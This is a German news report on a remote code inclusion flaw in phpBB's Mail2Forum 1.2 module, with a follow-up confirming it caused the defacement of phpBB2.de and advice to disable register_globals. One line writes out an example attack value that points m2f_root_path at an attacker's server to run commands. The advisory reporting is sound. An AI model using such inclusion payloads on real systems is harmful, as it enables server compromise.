Kritische Lücke in Modul der Forensoftware phpBB [Update]

Für das optionale Mail2Forum-Modul der beliebten Forensoftware phpBB ist ein Exploit aufgetaucht, mit dem Angreifer das System kompromittieren können. Ursache des Problems ist die fehlerhafte Verarbeitung des Parameters m2f_root_path in Skripten wie m2f_forum.php, m2f_mailinglist.php und anderen, mit der sich beliebiger PHP-Code ausführen lässt. So kann ein Angreifer den Pfad m2f_root_path auf einen eigenen Server umbiegen (m2f_root_path=http://[server]/cmd.txt?&cmd=ls) und so seinen Schadcode auf dem verwundbaren phpBB-Server ausführen. Wie immer in solchen Fällen lässt sich die Lücke nur ausnutzen, wenn die Option register_globals aktiv ist. Betroffen soll die Version Mail2Forum 1.2 sein. Ein offizieller Patch steht nicht zur Vefügung, Anwender sollten register_globals ausschalten oder den Quellcode des Modul selbst editieren.

Ob diese Lücke auch die Ursache für das Defacement von www.phpBB2.de, den Webseiten des nach eigenen Angaben offiziellen deutschen phpBB2-Supports, darstellt, ist unklar. Seit dem heutigen Dienstagmorgen bekommen Besucher auf der Startseite nur die Meldung "THES SIT HACKED" zu sehen. Interessanterweise ist der Text dabei in Fragmente einer HTML-Seite von Blackhat.com eingebettet, den Webseiten des Veranstalters der bekannten Sicherheitskonferenzen und Schulungen.

Update
Mittlerweile ist phpBB2.de wieder erreichbar. In einer Meldung bestätigen die Betreiber die Vermutung, dass die Lücke im Mail2Forum-Modul Ursache des Defacements war. Das Modul wurde zwar nicht aktiv eingesetzt, war aber nach zurückliegenden Tests in einem Unterverzeichnis von außen noch erreichbar. Das zweite offizielle deutsche phpBB-Support-Forum phpBB.de war von dem Angriff nicht betroffen. (dab)